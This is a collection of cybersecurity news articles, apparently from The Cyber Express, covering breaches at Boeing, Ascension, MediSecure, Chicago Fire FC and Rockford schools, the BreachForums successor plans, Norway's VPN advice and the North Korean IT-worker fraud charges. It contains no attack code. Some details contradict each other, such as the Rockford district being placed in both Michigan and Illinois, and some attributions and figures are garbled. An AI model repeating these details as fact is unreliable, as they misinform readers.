This week on TCE Cyberwatch, we delve into the recent hackings of major organizations, including the International Baccalaureate, Boeing, and BetterHelp, which have sparked widespread concern online. We also highlight ongoing developments in enhancing cybersecurity measures.

National governments are also grappling with cybersecurity challenges. TCE Cyberwatch examines how these issues have affected countries and the proactive steps organizations are taking to stay ahead in the evolving landscape of cybersecurity. Keep reading for the latest updates.

TCE Cyberwatch: A Weekly Round-Up

IB Denies Exam Leak Rumors, Points to Student Sharing

The International Baccalaureate Organization (IBO) faced allegations of exam paper leaks, but it denied any involvement in a cheating scandal. Instead, the organization acknowledged experiencing a hacking incident, unrelated to the current exam papers circulating online.

The breach was attributed to students sharing exam materials on social media platforms. Concurrently, the IBO detected malicious activity within its computer networks.

The act of students sharing exam content online is commonly known as "time zone cheating," wherein students who have already completed their exams disclose details about the questions before others take the test. Additionally, the malicious activity targeted data from 2018, including employee names, positions, and emails. Screenshots of this leaked information surfaced online. Read More

Boeing Hit by $200 Million Ransomware Attack, Data Leaked

The aeronautical and defense corporation, Boeing, recently confirmed that it had been targeted by the LockBit ransomware gang in October 2023. They also acknowledged receiving a $200 million demand from the attackers to prevent the publication of leaked data. On November 10, approximately 40GB of data was leaked by LockBit, though Boeing has not yet addressed the situation. The ransomware group initially identified Dmitry Yuryevich Khoroshev as the principal administrator and developer behind the LockBit ransomware operation. However, this claim has since been denied by the actual developer. Additionally, Boeing has not announced whether it paid the $200 million extortion demand. Read More

Lenovo Pledges Stronger Cybersecurity with "Secure by Design" Initiative

Lenovo recently joined the Secure by Design pledge initiated by the US Cybersecurity and Infrastructure Security Agency (CISA) to enhance its cybersecurity measures. This announcement was made on May 8th, and the initiative covers various areas including multi-factor authentication and vulnerability reduction. Doug Fisher, Lenovo’s Chief Security Officer, emphasized the importance of industry collaboration in driving meaningful progress and accountability in security. "It’s good for the industry that global technology leaders are able to share best practices," he stated. Many other tech companies have also joined this effort to ensure their security. Read More UK’s AI Safety Institute releases public platform which furthers safety testing on AI models. UK’s AI Safety Institute has recently made its AI testing and evaluation platform available publicly. Inspect, the platform that aims to start more safety tests surrounding AI and ensuring secure models. It works by assessing capabilities of models and then producing a score. It is available to AI enthusiasts, start-up businesses and international governments, as it is released through an open-source licence. Ian Hogarth, the Chair of the AI Safety Institute, has stated that, “We have been inspired by some of the leading open-source AI developers - most notably projects like GPT-NeoX, OLMo or Pythia which all have publicly available training data and OSI-licensed training and evaluation code, model weights, and partially trained checkpoints.” Inspect works by evaluating models in areas such as their autonomous abilities, abilities to reason, and overall core knowledge. Read More 

NASA Names First Chief Artificial Intelligence Officer

NASA announced its first Chief Artificial Intelligence (AI) Officer. David Salvagnini, who previously served as the Chief Data Officer, has now expanded his role to incorporate AI. His responsibilities included developing strategic vision and planning NASA's AI usage in research projects, data analysis, and system development.

NASA Administrator Bill Nelson stated, “Artificial intelligence has been safely used at NASA for decades, and as this technology expanded, it accelerated the pace of discovery.” Salvagnini also worked alongside government agencies, academic institutions, and others in the field to ensure they remained up to date with the AI revolution. Read More. Read More 

DDoS Attacks Target Australia Amidst Ukraine Support

The Cyber Army Russia Reborn launched Distributed Denial of Service (DDoS) attacks targeting prominent Australian companies like Auditco and Wavcabs. While the exact motive remains unclear, the timing suggests a political backlash against Australia's solidarity with Ukraine.

Wavcabs experienced disruptions to its online services, while Auditco encountered technical difficulties believed to be linked to these attacks. Despite the cyber onslaught, Australia remained steadfast in its support for Ukraine, announcing a $100 million aid package comprising military assistance and defense industry support. Read More

British Columbia Thwarts Government Cyberattack, Strengthens Defenses

British Columbia’s government recently confirmed an attempt to infiltrate their information systems. The incidents were identified as “sophisticated cybersecurity incidents” by B.C.’s solicitor-general and public safety minister. There is no current evidence suggesting that personal information, such as health records, was compromised. The government's proactive measures in 2022 played a significant role in detecting the breach.

The government ensured to further secure systems, including requiring government employees to change their passwords. Officials and cybersecurity experts continue to work to ensure sensitive information remains secure and to prevent unauthorized access. The country appears to be using this incident to prepare itself for future cyber threats. Read More

Urgent Chrome Update: Google Patches Sixth Zero-Day of 2024

A new vulnerability in Google Chrome was uncovered, marking their sixth zero-day incident in 2024. Google swiftly released an emergency update to patch the issue, ensuring users' safety. Updates were promptly distributed across Mac, Windows, and Linux platforms.

For those concerned about their security, updating their devices is crucial. Users can navigate to Settings > About Chrome to initiate the update process. While Google has not disclosed specific details about the breach, the urgency conveyed by their release of an "emergency patch" underscores the severity of the situation. Read More

To Wrap Up

Cyberattacks continue to dominate headlines, but this week's TCE Cyberwatch report also reveals positive developments. Governments are taking action, with proactive measures in British Columbia and the UK's AI safety testing platform. Organizations are prioritizing security, as seen in Lenovo's "Secure by Design" initiative.

Individuals play a crucial role too. The recent Google Chrome update reminds us to prioritize software updates. While cyber threats persist, these advancements offer a reason for cautious optimism. By working together, we can build a more secure digital future.

Remember, vigilance is key. Update your software regularly and follow best practices to minimize vulnerabilities. TCE Cyberwatch remains committed to keeping you informed.

Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Following the recent Ascension ransomware attack, legal challenges are mounting for the healthcare giant. Just days after the cyberattack disrupted operations across its extensive network of 140 hospitals, Ascension is facing two proposed class-action lawsuits. The lawsuits, filed in the District Courts of Illinois and Texas, allege negligence on Ascension's part, citing the failure to encrypt patient data as a critical oversight. This, plaintiffs argue, has exposed them to the risk of identity theft for years to come, following the Ascension cyberattack that forced the diversion of ambulances and the suspension of elective care services.

Class-Action Lawsuit Arises from Ascension Ransomware Attack

While Ascension has not confirmed any compromise of patient data, investigations are ongoing. Plaintiffs contend that had proper encryption measures been in place, data stolen by the cybercriminal group Black Basta would have been rendered useless, highlighting the negligence they claim Ascension displayed. We are conducting a thorough investigation of the incident with the support of leading cybersecurity experts and law enforcement," an Ascension spokesperson stated. "If we determine sensitive data was potentially exfiltrated or accessed, we will notify and support the affected individuals in accordance with all relevant regulatory and legal obligations”, reported Healthcare Dive on Thursday. The lawsuits, filed shortly after the Ascension ransomware attack, target the healthcare provider's alleged failure to implement adequate cybersecurity measures, a move plaintiffs argue could have prevented the incident. Both cases, represented by the same legal counsel, highlight the harm suffered by patients due to the exposure of their private information, which they assert was foreseeable and preventable.

Ascension Lawsuit and Mitigation Tactics

Despite ongoing investigations and assurances of cooperation with authorities, Ascension has yet to disclose whether patients' sensitive information was compromised during the cyber incident.  “Ascension continues to make progress towards restoration and recovery following the recent ransomware attack. We continue to work with industry leading forensic experts from Mandiant to conduct our investigation into this attack and understand the root cause and how this incident occurred”, stated Ascension on its Cybersecurity Event Update page.  In parallel, additional cybersecurity experts from Palo Alto Networks Unit 42 and CYPFER have been brought in to supplement the rebuilding and restoration efforts. The focus is on safely and swiftly bringing systems back online. “We are also working on reconnecting with our vendors with the help of our recovery experts. Please be aware that it may still take some time to return to normal operations”, added Ascension.  The Catholic health system, which spans 140 hospitals and 40 senior living facilities nationwide, employs a workforce of approximately 132,000 individuals. Despite the financial strain imposed by the Ascension ransomware attack, industry analysts note Ascension's robust liquidity and leverage position, offering a significant rating cushion against such one-off events. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

While the recent takedown of BreachForums by the FBI, in collaboration with international law enforcement agencies, marked a significant victory against cybercrime. Less than 24 hours after this major blow, the renowned threat actor known as USDoD made an announcement stating his plans to resurrect the forum's community, demonstrating the relentless nature of the cyber underworld. BreachForums had long been a central marketplace for cybercriminals, facilitating the trade of stolen data and hacking tools. Its sudden removal from the dark web was a monumental achievement for law enforcement, akin to dismantling a major illicit market. However, the cybercriminal community's response was swift and defiant as demonstrated by the alleged claim by ShinyHunters, one of the leftover administrators just a day later that the site domain itself had been recovered. Alongside the possible domain recovery, USDoD also separately pledged to rebuild and improve upon BreachForums through a newer competitive forum, promising a new beginning for the infamous community.

USDoD Announces Creation of Breach Nation Forum

In a bold statement following the takedown, USDoD assured the community that he had already been working on rebuilding BreachForums, promising that the forum's legacy and user data would be preserved. He emphasized his dedication to creating a new community, presenting the takedown as not the end but an opportunity for a fresh start. [caption id="attachment_69063" align="alignnone" width="523"] Source: X.com (@EquationCorp)[/caption] His announcement also detailed the allocation of resources and infrastructure to support the new forum. The new domains, breachnation.io and databreached.io, are set to launch on July 4, 2024, symbolically coinciding with Independence Day. This new community, dubbed "Breach Nation," aims to offer enhanced features and security. [caption id="attachment_69064" align="alignnone" width="544"] Source: X.com (@EquationCorp)[/caption] USDoD’s vision for BreachForums 3.0 includes robust infrastructure, with separate servers to ensure optimal performance and security. He has assured the community that he is not driven by profit and aims to offer an upgraded member rank to the first 200,000 users as a token of goodwill. He acknowledged the challenges ahead, including potential opposition from law enforcement as well as possible competition from the BreachForums administrator ShinyHunters. He also addressed concerns about compromise within the forum's administration, stating that he would initially manage it alone to ensure security and build trust.

USDoD's Earlier Activities

USDoD's bold promise to create the new Breach Nation forum highlights the persistence of the cybercriminal underworld. The threat actor is a notable figure in the cybercriminal community and was previously known as NetSec on RaidForums. USDoD is known to employ sophisticated social engineering and impersonation techniques to penetrate secure systems. His activities included exposing data related to several high-profile organizations such as InfraGard, Airbus, and several, the U.S. Army, NATO Cyber Center, and CEPOL. He also claimed responsibility for alleged data leaks from the defense contractor Thales as well the Communist Party of China. A newer CDN created by USDoD was first publicized around the same time as the alleged China data leak, this CDN is stated to be incorporated for the new domain's infrastructure and seemingly being reworked and shifted to a new domain. [caption id="attachment_69068" align="alignnone" width="566"] Source: X.com (@EquationCorp)[/caption] While the potential impact of the new forum remains unclear, it may be a key development to watch in the ongoing struggle between law enforcement and cybercrime in the aftermath of the BreachForums domain seizure. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The MediSecure data breach is an “isolated” attack with no impact on the current e-Priscription services, the Australian National Cyber Security Coordinator said on Friday. There is also no evidence of an increased cyber threat to the medical sector, she added. After the electronic prescriptions provider MediSecure on Thursday reported being victim of a “large-scale ransomware data breach” that likely originated from a third-party vendor, Australia’s cyber chief, Lieutenant General Michelle McGuinness, said in an update the government was still “working to build a picture of the size and nature of the data that has been impacted by this data breach.”

“This (breach) discovery work often takes time and I understand Australians are anxious about the possibility of their personal information being affected,” the cyber chief said.

McGuinness said she convened the National Coordination Mechanism (NCM) with the National Emergency Management Agency on Thursday, which brings all relevant Government stakeholders together and ensures they are in-sync with the same information and understanding of the issue. “The NCM allows us to achieve strong situational awareness and ensures that together, we’re best positioned to identify options available to the Australian Government to respond to the incident,” she added. The cyber chief assured that the authorities were working at top pace to complete their investigation and would soon share information about what has been impacted. “We will share this with you – along with what affected people may need to do to protect themselves,” McGuinness said.

Timeline of the MediSecure Data Breach – So Far

The Australian National Cyber Security Coordinator first disclosed details of the MediSecure “large-scale ransomware data breach incident” on Thursday morning stating it impacted the personal and health information of individuals. McGuinness said in a statement that her office was managing the fallout from the major hacking incident through a “whole-of-government response.” “We are in the very preliminary stages of our response and there is limited detail to share at this stage, but I will continue to provide updates as we progress while working closely with the affected commercial organization to address the impacts caused by the incident,” said McGuinness, at the time. She did not initially name the victim company but said it was a “commercial health information organization.” Local media, however, later confirmed that the unnamed entity was MediSecure, which was at the center of the large-scale ransomware data breach announced by the National Cyber Security Coordinator. The e-prescription provider MediSecure’s websites were down since Wednesday but the company on Thursday evening issued a statement acknowledging the cybersecurity incident which said that "early indicators suggest the incident originated from one of our third-party vendors." The company did not disclose the specifics like the number of people impacted, the type of information compromised and the threat actor behind the ransomware breach, but said the cybersecurity incident impacts “the personal and health information of individuals.” McGuinness said the Australian Cyber Security Centre was aware of the incident and the Australian Federal Police was investigating it. In a Friday update the cyber chief said that based on the preliminary investigation, what the Government could confirm was that “no current ePrescriptions have been impacted or accessed.” “The Department of Health has confirmed there has been no impact to the ePrescription services currently in use,” McGuinness said.

“On the basis of technical advice from MediSecure to date, the original compromise has been isolated and there is no evidence to suggest an increased cyber threat to the medical sector,” McGuinness said.

The investigators have not seen any evidence of identity documents been compromised in the breach. They are currently working with the company and other agencies “to build a full picture of the impacted dataset,” McGuinness said. “We have not seen evidence so far to suggest that anyone needs to replace their Medicare card. If our investigation turns up any evidence to suggest Australians’ identities are at risk and they need to replace their documents, we will let them know.” The Australian Medical Association was briefed Friday morning from the cyber chief’s office about the MediSecure data breach after it demanded a thorough and transparent investigation with clear and consistent communication to the public and the medical fraternity. “This is critical to maintaining community trust in the electronic systems that are now integral to the functioning of our health system,” the AMA had earlier said. The AMA welcomed the formation of a National Stakeholder Group to support the government's response. “While we expect to see further updates from the government, the most important message today is that patients should not hesitate to get their prescriptions filled as these are not affected by the breach,” the AMA said.

MediSecure is Only One-of-Two

MediSecure is a prescription exchange service (PES), a kind of secure messaging system that specializes in transferring prescriptions between healthcare providers or doctors (prescribers) and the pharmacy (dispenser). It is only one of the two ePrescriptions providers in Australia that became prominent for issuing millions of electronic prescriptions when the Covid-19 pandemic began in 2020. As of January 2024, more than 80,000 prescribers in Australia including general practitioners and nurses have issued over 189 million e-prescriptions. The tender closed on 2 June 2022 and in May 2023, the department signed a 4-year contract for Fred IT's. The Department of Health last year shifted to a single provider – eRx supplied by Fred IT Group – in a four-year agreement that costed more than $100. As part of that agreement, eRx Script Exchange became the sole supplier of the national Prescription Delivery Service from July 1, 2023, which meant public healthcare providers and pharmacies were required to shift entirely from MediSecure to eRx ePrescriptions. MediSecure still provides prescription services to private providers. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The Norwegian National Cyber Security Centre (NCSC) has issued an recommendation advising organizations for the replacement of SSLVPN and WebVPN solutions with more secure alternatives, due to the repeated exploitation of vulnerabilities in edge network devices in the past that allowed attackers to breach corporate networks. The National Cyber Security Centre (NCSC), a sub-division of the Norwegian Security Authority functions as Norway's primary liaison for coordinating national efforts to prevent, detect, and respond to cyber attacks, as well as providing strategic guidance and technical support to enhance the overall cyber security posture of the country. This includes conducting risk assessments, disseminating threat intelligence, and promoting best practices in both the public and private sector. The NCSC's guidance is aimed at enhancing the security posture of organizations, particularly those within critical infrastructure sectors, by advocating for the transition to more robust and secure remote access protocols.

Replacement of SSLVPN and WebVPN With Secure Alternatives

The NCSC's recommendation is underpinned by the recognition that SSL VPN and WebVPN, while providing secure remote access over the internet via SSL/TLS protocols, have been repeatedly targeted due to inherent vulnerabilities. These solutions create an "encryption tunnel" to secure the connection between the user's device and the VPN server. However, the exploitation of these vulnerabilities by malicious actors has led the NCSC to advise organizations to migrate to Internet Protocol Security (IPsec) with Internet Key Exchange (IKEv2). IPsec with IKEv2 is the NCSC's recommended alternative for secure remote access. This protocol encrypts and authenticates each packet of data, using keys that are refreshed periodically. Despite acknowledging that no protocol is entirely free of flaws, the NCSC believes that IPsec with IKEv2 significantly reduces the attack surface for secure remote access incidents, especially due to its reduced tolerance for configuration errors compared to SSLVPN. The NCSC emphasizes the importance of initiating the transition process without delay. Organizations subject to the Safety Act or classified as critical infrastructure are encouraged to complete the transition by the end of 2024, with all other organizations urged to finalize the switch by 2025. The recommendation to adopt IPsec over other protocols is not unique to Norway; other countries, including the USA and the UK, have also endorsed similar guidelines, underscoring the global consensus on the enhanced security offered by IPsec with IKEv2. As a preventative measure, the NCSC also recommended the use of 5G from mobile or mobile broadband as an alternative in locations where it was not possible to implement an IPsec connection.

Recommendation Follows Earlier Notice About Exploitation

Last month, the Norwegian National Cyber Security Centre had issued a notice about a targeted attack campaign against SSLVPN products in which attackers exploited multiple zero-day vulnerabilities in Cisco ASA VPN used to power critical infrastructure facilities. The campaign had been observed since November 2023. This notice intended primarily towards critical infrastructure businesses warned that while the entry vector in the campaign was unknown, the presence of at least one or more zero-day vulnerabilities potentially allowed external attackers under certain conditions to bypass authentication, intrude devices and and grant themselves administrative privileges. The notice shared several recommendations to protect against the attacks such as blocking access to services from insecure infrastructure such as anonymization services (VPN providers and Tor exit nodes) and VPS providers. Cisco released important security updates to address these vulnerabilities. The earlier notice also recommended that businesses switch from from the SSLVPN/clientless VPN product category to IPsec with IKEv2, due to the presence of critical vulnerabilities in such VPN products, regardless of the VPN provider. The NCSC recommends businesses in need of assistance to contact their sector CERT or MSSP. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

A recent cyberattack on Chicago Fire FC has come to light, with the football club officially confirming the data breach. The club released a statement addressing the incident, highlighting the importance of privacy and security for all involved parties.  The Chicago Fire FC data breach, discovered on October 25, 2023, involved unauthorized access to the club's systems, potentially compromising personal information. Immediate measures were taken upon detection, including securing systems and launching an investigation with legal and forensic experts.  The unauthorized access occurred between October 22 and October 25, 2023.

Decoding the Chicago Fire FC Data Breach

According to the official press release, personal data that may have been accessed includes names, social security numbers, driver’s license and passport information, medical records (including Covid test results and injury reports), health insurance details, financial account information, and dates of birth. While there is no current indication of misuse, the club is taking proactive steps to address the Chicago Fire FC data breach. In response to the cyberattack on the football club, Chicago Fire FC has initiated several actions. These include providing affected individuals access to credit monitoring services through Cyberscout, a TransUnion company specializing in fraud assistance. Instructions for enrollment in these complimentary services have been made available, and affected individuals are encouraged to confirm eligibility by contacting the club. Individuals who believe they may have been affected but have not received notification are urged to reach out to Chicago Fire FC for assistance and to receive a credit monitoring code. Additionally, the club has reported the incident to law enforcement for further investigation.

Mitigation Against the Chicago Fire FC Cyberattack

To safeguard against potential identity theft and fraud, affected individuals are advised to monitor their accounts and credit reports for any suspicious activity. They can obtain free credit reports annually from major credit reporting bureaus and are entitled to place fraud alerts or credit freezes on their accounts. For further information and support regarding identity theft and fraud prevention, individuals can contact the credit reporting bureaus, the Federal Trade Commission (FTC), or their state Attorney General. The FTC encourages victims of identity theft to file a complaint with them and provides resources for reporting instances of misuse. Chicago Fire FC emphasizes its commitment to data security and the protection of individuals' information. The club remains dedicated to maintaining trust and providing support to those affected by the cyberattack.

Chicago Fire FC Offers Credit Monitoring Services 

[caption id="attachment_68968" align="alignnone" width="1280"] Source: Chicago Fire FC[/caption] To enroll in the Credit Monitoring services provided by Chicago Fire FC at no charge, individuals are instructed to visit https://bfs.cyberscout.com/activate and follow the provided instructions. It's essential to enroll within 90 days from the date of the notification letter to receive the monitoring services. However, minors under 18 years of age may not be eligible for this service. During the enrollment process, individuals may need to verify personal information to confirm their identity for security purposes. It's strongly advised to monitor accounts and credit reports regularly to detect any suspicious activity or errors. Under U.S. law, individuals are entitled to one free credit report annually from each of the three major credit reporting bureaus: TransUnion, Experian, and Equifax. These reports can be ordered at www.annualcreditreport.com or by calling 1-877-322-8228. Upon receiving the report, individuals should carefully review it for any discrepancies, unauthorized accounts, or inquiries. Individuals also have the right to place a fraud alert on their credit file at no cost. This alert lasts for one year and requires businesses to verify the individual's identity before extending new credit. Victims of identity theft can request an extended fraud alert lasting seven years. Alternatively, individuals can opt for a "credit freeze," which restricts access to their credit report without their explicit authorization. While this prevents unauthorized access, it may also delay or interfere with legitimate credit applications. To request a fraud alert or credit freeze, individuals need to provide specific information to the three major credit reporting bureaus, including their full name, social security number, date of birth, address history, and proof of identity. Additionally, victims of identity theft should file a police report and notify law enforcement, their state Attorney General, and the Federal Trade Commission (FTC). Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Dispel, a provider of zero-trust remote access, data streaming, managed attribution, and DMZ unification for industrial control systems, announced that its Board of Directors has appointed Dean Macris as the company’s new Chief Information Security Officer (CISO).

Macris, a seasoned cybersecurity expert, will oversee the company's compliance with a range of rigorous standards, including NIST 800-53, NIST 800-171, NIST 800-172, NERC CIP, IEC 62443, SOC 2, and ISO 27001.

The announcement was accompanied by a statement from Chris DiLorenzo, Dispel’s Chief Technology Officer (CTO), emphasizing the multifaceted nature of modern cybersecurity challenges. “Given the environments, our systems are being asked to operate in, we needed someone who recognized cybersecurity was not only a programming and process problem but also an electromagnetic problem,” DiLorenzo noted. “Dean has that firsthand knowledge.”

Dean Macris: Diverse Experience in Cybersecurity

Macris's career spans significant roles in both operational and information technology. His experience includes serving as the Theater Operations Officer of U.S. Forces Korea and Cyber Technical Director for Naval Special Warfare. At General Dynamics Electric Boat, Dean Macris managed the Signature Secret Network, the company's largest classified information system. Additionally, he has an academic background as an instructor of Cyber Systems at the United States Coast Guard Academy, where he led the development of the Seagoing Vessel Testbed for Industrial Controls within the Control Environment Laboratory Resource. Dean Macris also continues his military service as a Lieutenant Commander in the U.S. Navy. Macris’s appointment signals Dispel's commitment to integrating enhanced cybersecurity measures into its product lifecycle. Ian Schmertzler, Dispel’s President and Co-founder, highlighted this approach. "We wanted someone who would work to meet the spirit, as well as the letter, of cybersecurity standards," Schmertzler said. "That is not only the right thing to do, but also a competitive differentiator in our markets."

Impressive Academic Background

Macris holds a BS in Systems Engineering from the U.S. Merchant Marine Academy and an MBA from the University of Connecticut. He is also pursuing advanced studies, including a Master’s in National Security and Strategic Studies from the U.S. Naval War College and a PhD in Computer Engineering from the University of Rhode Island. Dispel, founded in 2015, has quickly established itself as a leading provider of zero-trust remote access, data streaming, managed attribution, and DMZ unification for industrial control systems. The company's technologies serve a diverse array of clients, representing roughly half a trillion dollars in annual manufactured output worldwide. With cybersecurity threats on the rise, Dispel’s proactive stance on security compliance is critical for protecting industrial control systems that underpin essential sectors like energy, manufacturing, and transportation. Macris’s extensive background is expected to enhance Dispel’s ability to deliver secure, innovative solutions. His blend of military, academic, and industry experience equips him to address the complex security challenges faced by Dispel's clients. This appointment comes at a time when cybersecurity is more crucial than ever, especially for the critical infrastructure that Dispel’s solutions help protect. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The Rockford Public School Disttrict in Michigan has successfully restored its systems after a ransomware attack caused significant disruption earlier this week, forcing the shutdown of its computer, email, and phone systems. Despite acting swiftly to contain the Rockford Public Schools ransomware attack as an attempt to ensure the safety of its students and staff, the measures also forced the school district to resort to traditional pen and paper-based offline methods for schooling. A day after the incident, the district superintendent confirmed the isolation of the attack and the restoration of systems, indicating that students and staff could operate as normal. Established in 1884, Rockford Public Schools is a prominent educational institution in Rockford, Illinois. With 45 schools catering to around 27,766 students, it spans across portions of Kent County and serves parts of Plainfield, Algoma, Courtland, Cannon, Grattan, and Oakfield Townships. The district's consolidation in the late 1950s brought together several neighborhood school systems, and it expanded into 45 schools serving approximately 27,766 students.

Systems Restored After Rockford Public Schools Ransomware Attack

On the morning of the incident, district leaders were alerted to computer system failures within the school district disrupting its phones and internet services. While it was initially suspected to be a vendor issue, it soon became clear that the district was struck by a ransomware attack after ransom notes were discovered on various printers. Superintendent Steve Matthews promptly ordered the shutdown of all network connections, including Wi-Fi, to contain the threat. He anticipated that it would take at least a couple of days for the district to return to normal operations. The official website of the school district displayed emergency phone numbers for various buildings within the school district during the time of the attack. [caption id="attachment_68941" align="alignnone" width="1768"] Source: rockfordschools.org[/caption] Despite the attack, there was no immediate threat to student safety. Classes continued as usual, albeit with a return to traditional, technology-free teaching methods. Superintendent Matthews reassured that security systems for school doors remained functional, and emergency cell phones were made available for parental contact. The FBI was also involved in the investigation, working alongside district staff to assess the extent of the breach.  Superintendent Matthews acknowledged the initial challenge but noted that staff were quickly adjusting to the incident. Students reported a unique experience of engaging in learning without digital tools, while some found the situation disconcerting. Parents were informed about the situation through emergency communication channels. While some parents chose to pick up their children early, the overall response was one of cautious adaptation. Following the preventative measures, the public school district restored its computer systems 24 hours later, with the district superintendent stating that the incident had been isolated and contained. The school issued a letter to parents, indicating that says students and staff could resume using district-provided school equipment or their own personal devices.

Expert Indicates Educational Institutes as Common Ransomware Target

Cybersecurity expert Greg Gogolin from Ferris State University noted in response to the incident, that school districts are common targets for ransomware attacks due to inadequate preventive measures and limited cybersecurity staff. Gogolin highlighted that the end of the school year is a particularly vulnerable time for such attacks, as the urgency to resolve the situation increases with grades due and other academic deadlines approaching. Affluent districts are particularly targeted due to attackers perceiving them as having more resources available. To mitigate such risks, Gogolin advises districts to invest in advanced email filtering while educating staff about phishing emails. Additionally, teachers and students should maintain backups of essential data, such as grades and assignments, outside of school networks. The return to the traditional schooling method following the Rockford Public Schools ransomware attack is reminiscent to an earlier incident affecting Cannes Hospital, which forced its staff to resort to pen-and-paper techniques to keep services running. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The U.S. federal prosecutors on Thursday revealed charges against a North Korean job fraud nexus that ran its fraudulent scheme to generate illicit revenue for Kim Jong Un’s regime and support its sanctioned nuclear program. The U.S. Department of Justice indicted an Arizona woman, a Ukrainian man and three North Korean nationals for their alleged participation in job fraud schemes that placed overseas information technology workers – posing as U.S. citizens and residents - in remote positions at U.S. companies. This job fraud nexus scammed more than 300 U.S. companies and accumulated at least $6.8 million, said the unsealed indictment of Christina Marie Chapman, 49, from Litchfield Park, Arizona. The U.S. State Department said that between October 2020 and October 2023, Chapman, a U.S. citizen, helped North Korean IT workers under the aliases Jiho Han, Chunji Jin and Haoran Xu, to fraudulently obtain work as remote software and applications developers with companies in a range of sectors and industries including a major television network, a Silicon Valley technology company, an aerospace and defense company, an American car manufacturer, a luxury retail store and a U.S.-hallmark media and entertainment company.

“They also attempted - but failed - to gain similar employment at two U.S. government agencies,” the State Department said.

In pursuit of running the job fraud scheme, Chapman and her co-conspirators took help of identity fraud. “They compromised more than 60 identities of (legitimate) U.S. persons, impacted more than 300 U.S. companies, caused false information to be conveyed to the Department of Homeland Security on more than 100 occasions, created false tax liabilities for more than 35 U.S. persons, and resulted in at least $6.8 million of revenue to be generated for the overseas IT workers,” the Justice Department said.

Chapman’s Role in Job Fraud

Chapman hosted a “laptop farm,” for the North Korean IT workers at her residence, so that the computers appeared to be located within the United States on a daily basis.

“She also helped launder the proceeds from the scheme by receiving, processing, and distributing paychecks from the U.S. firms to these IT workers and others,” the State Department said.

Chapman was arrested on Wednesday in her hometown in Arizona and faces a litany of counts including conspiracy to defraud the United States, conspiracy to commit wire fraud, conspiracy to commit bank fraud, aggravated identity theft, conspiracy to commit identity fraud, conspiracy to launder monetary instruments, operating as an unlicensed money transmitting business, and unlawful employment of aliens.

Didenko, the Facilitator

The Justice department also named a Ukrainian national Oleksandr Didenko, 27, in the unsealed charges. Didenko allegedly run a multi-year scheme to create accounts at U.S.-based freelance IT job search platforms under false identities and sold these accounts to overseas IT workers. Remote workers used these false identities to apply for jobs with unsuspecting companies. To facilitate this fraudulent activity, Didenko hosted a website “UpWorkSell”, which advertised the ability for remote IT workers to buy or rent accounts on various platforms using identities other than their own. The complaint alleged that Didenko offered a full array of services to allow an individual to pose under a false identity and market themselves for remote IT work, and that he knew that some of his customers were North Korean. Didenko managed approximately 871 proxy identities, provided proxy accounts for three freelance IT hiring platforms and for three different money service transmitters, the complaint against Didenko said. Together with the co-conspirators, Didenko facilitated the operation of at least three U.S.-based “laptop farms,” hosting approximately 79 computers. The Justice Department said it raided four U.S. residences under Didenko’s control where he ran laptop farms. He also laundered $920,000 worth payments since July 2018 in the job fraud scheme. Didenko was arrested in Poland on May 7, and the State Department is seeking his extradition.

The North Korean Trio

The three North Korean workers "are linked to the DPRK’s Munitions Industry Department, which oversees the development of the DPRK’s ballistic missiles, weapons production, and research and development programs," the State Department said. The department said the workers tried to get hired at two unnamed U.S. government agencies but failed three separate times. Details about the three North Korean IT workers are scarce but the State Department released an image of Jiho Han on its Rewards for Justice platform where it also announced a bounty of up to $5 million for information on any of these North Korean IT workers that leads to the disruption of financial mechanisms of the people engaged. [caption id="attachment_68911" align="aligncenter" width="1024"] Credit: U.S. Department of State[/caption]   The FBI also released an alert about North Korean IT workers and their scheme to defraud U.S. businesses and fund Pyongyang’s illicit activities.

Targeting of Illicit IT Worker Activities

The latest announcement comes almost a year after the U.S. Treasury announced sanctions on four entities that employed thousands of North Korean IT workers that help illicitly finance the regime's missile and weapons of mass destruction programs. The treasury, at the time, said North Korea had scores of “highly skilled” IT workers around the globe who “generate revenue that contributes to its unlawful WMD and ballistic missile programs.” These individuals, who can earn up to $300,000 annually, “deliberately” obscure their identities, locations and nationalities, using proxy accounts, stolen identities and falsified or forged documentation to apply for jobs, the Treasury said. The 15-member United Nations Security Council has long prohibited North Korea from engaging in nuclear tests and ballistic missile launches. Since 2006, the country has been under stringent UN sanctions, continuously bolstered by the Council to sever financial support for its weapons of mass destruction (WMD) development endeavors. Yet, Pyongyang has amassed a staggering $3 billion funding for its nuclear program from cyberattacks particularly on cryptocurrency related companies. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

